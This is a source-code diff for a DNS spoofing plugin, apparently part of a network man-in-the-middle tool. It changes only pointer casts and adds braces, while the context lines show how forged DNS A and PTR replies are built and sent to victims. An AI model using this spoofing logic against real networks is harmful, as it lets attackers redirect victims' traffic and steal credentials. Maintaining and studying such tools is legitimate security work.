@@ -192,7 +192,7 @@ static int load_db(void)
       SAFE_CALLOC(d, 1, sizeof(struct dns_spoof_entry));
 
       /* fill the struct */
-      ip_addr_init(&d->ip, AF_INET, (char *)&ipaddr);
+      ip_addr_init(&d->ip, AF_INET, (u_char *)&ipaddr);
       d->name = strdup(name);
       d->type = type;
 
@@ -296,7 +296,7 @@ static void dns_spoof(struct packet_object *po)
          
          struct ip_addr *reply;
          u_int8 answer[(q - data) + 16];
-         char *p = answer + (q - data);
+         u_char *p = answer + (q - data);
          char tmp[MAX_ASCII_ADDR_LEN];
          
          /* found the reply in the list */
@@ -326,7 +326,7 @@ static void dns_spoof(struct packet_object *po)
       } else if (type == ns_t_ptr) {
          
          u_int8 answer[(q - data) + 256];
-         char *a, *p = answer + (q - data);
+         char *a, *p = (char*)answer + (q - data);
          int rlen;
          
          /* found the reply in the list */
@@ -345,7 +345,7 @@ static void dns_spoof(struct packet_object *po)
          memcpy(p + 4, "\x00\x01", 2);                    /* class */
          memcpy(p + 6, "\x00\x00\x0e\x10", 4);            /* TTL (1 hour) */
          /* compress the string into the buffer */
-         rlen = dn_comp(a, p + 12, 256, NULL, NULL);
+         rlen = dn_comp(a, (u_char*)p + 12, 256, NULL, NULL);
          /* put the length before the dn_comp'd string */
          p += 10;
          NS_PUT16(rlen, p);
@@ -360,7 +360,7 @@ static void dns_spoof(struct packet_object *po)
          
          struct ip_addr *reply;
          u_int8 answer[(q - data) + 21 + 16];
-         char *p = answer + (q - data);
+         char *p = (char*)answer + (q - data);
          char tmp[MAX_ASCII_ADDR_LEN];
          
          /* found the reply in the list */
@@ -391,7 +391,7 @@ static void dns_spoof(struct packet_object *po)
          memcpy(p + 25, "\x00\x01", 2);                     /* class */
          memcpy(p + 27, "\x00\x00\x0e\x10", 4);             /* TTL (1 hour) */
          memcpy(p + 31, "\x00\x04", 2);                     /* datalen */
-         ip_addr_cpy(p + 33, reply);                        /* data */
+         ip_addr_cpy((u_char*)p + 33, reply);                        /* data */
          
          /* send the fake reply */
          send_dns_reply(po->L4.src, &po->L3.dst, &po->L3.src, po->L2.src, ntohs(dns->id), answer, sizeof(answer), 1);
@@ -403,7 +403,7 @@ static void dns_spoof(struct packet_object *po)
 
          struct ip_addr *reply;
          u_int8 answer[(q - data) + 16];
-         char *p = answer + (q - data);
+         char *p = (char*)answer + (q - data);
          char tmp[MAX_ASCII_ADDR_LEN];
 
          /* found the reply in the list */
@@ -421,7 +421,7 @@ static void dns_spoof(struct packet_object *po)
          memcpy(p + 4, "\x00\x01", 2);                    /* class IN */
          memcpy(p + 6, "\x00\x00\x0e\x10", 4);            /* TTL (1 hour) */
          memcpy(p + 10, "\x00\x04", 2);                   /* datalen */
-         ip_addr_cpy(p + 12, reply);                      /* data */
+         ip_addr_cpy((u_char*)p + 12, reply);                      /* data */
 
          /* send the fake reply */
          send_dns_reply(po->L4.src, &po->L3.dst, &po->L3.src, po->L2.src, ntohs(dns->id), answer, sizeof(answer), 1);
@@ -460,7 +460,7 @@ static int get_spoofed_ptr(const char *arpa, char **a)
    struct dns_spoof_entry *d;
    struct ip_addr ptr;
    int a0, a1, a2, a3;
-   char ip[4];
+   u_char ip[4];
 
    /* parses the arpa format */
    if (sscanf(arpa, "%d.%d.%d.%d.in-addr.arpa", &a3, &a2, &a1, &a0) != 4)
@@ -551,7 +551,9 @@ static void dns_spoof_dump(void)
          DEBUG_MSG("  %s -> [%s], type %s", d->name, int_ntoa(d->ip.addr),
                    type_str(d->type));
       else
+      {
          DEBUG_MSG("  %s -> ??", d->name);   /* IPv6 possible? */
+      }
    }
 }
    
